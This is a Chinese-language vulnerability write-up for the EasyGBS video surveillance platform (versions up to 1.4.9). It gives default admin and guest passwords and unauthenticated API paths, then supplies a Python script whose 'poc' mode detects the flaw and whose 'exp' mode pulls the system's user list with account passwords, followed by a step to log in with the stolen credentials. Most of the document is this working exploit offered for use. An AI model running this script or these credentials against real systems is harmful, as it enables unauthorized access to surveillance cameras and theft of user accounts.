一、漏洞详情
EasyGBS是由TSINGSEE开发一款国标视频云平台。EasyGBS<=1.4.9版本的平台存在未授权访问漏洞,攻击者可以直接访问平台的API接口文档,从而获取系统的API接口造成信息泄露。
二、影响版本
EasyGBS <= 1.4.9
三、漏洞利用
1、默认口令:
easygbs/easygbs # 管理员权限
guest2020/guest2014&2020 # 游客权限2、API接口文档:/apidoc/#api-device
3、用户账户密码信息泄露:/api/v1/userlist?pageindex=0&pagesize=10
4、利用泄露的用户信息,登陆视频监控系统:
5、POC漏洞脚本检测
import requests
from bs4 import BeautifulSoup
import sys
def check_poc(result):
bf = BeautifulSoup(result.text, 'lxml')
list_1 = bf.find_all('div', class_='spinner')
if list_1:
return True
else:
return False
def check_exp(result):
if "UserList" in result.text:
return True
else:
return False
class Scan():
def poc(self, url):
payload_1 = r'/apidoc/#api-device'
headers = {
'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
}
try:
result = requests.get(url + payload_1, headers=headers)
if result.status_code == 200 and check_poc(result):
return {
0: "[+] 存在EasyGBS未授权访问漏洞!",
1: "API文档地址:{}".format(url + payload_1),
}
else:
return {0: "[-] 不存在EasyGBS未授权访问漏洞!"}
except:
return {0: "[-] 可能不存在EasyGBS未授权访问漏洞!"}
def exp(self, url):
payload_2 = r'/api/v1/userlist?pageindex=0&pagesize=10'
headers = {
'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
}
try:
result = requests.get(url + payload_2, headers=headers)
if result.status_code == 200 and check_exp(result):
info = result.json()['UserList']
result_list = []
for i in range(len(info)):
result_list.append([i,info[i]])
return result_list
else:
return {0: "[-] 获取用户信息失败!"}
except:
return {0: "[-] 可能获取用户信息失败!"}
if __name__ == "__main__":
url = sys.argv[1]
type = sys.argv[2]
scan = Scan()
if type == 'poc':
result = scan.poc(url)
else:
result = scan.exp(url)
print(dict(result))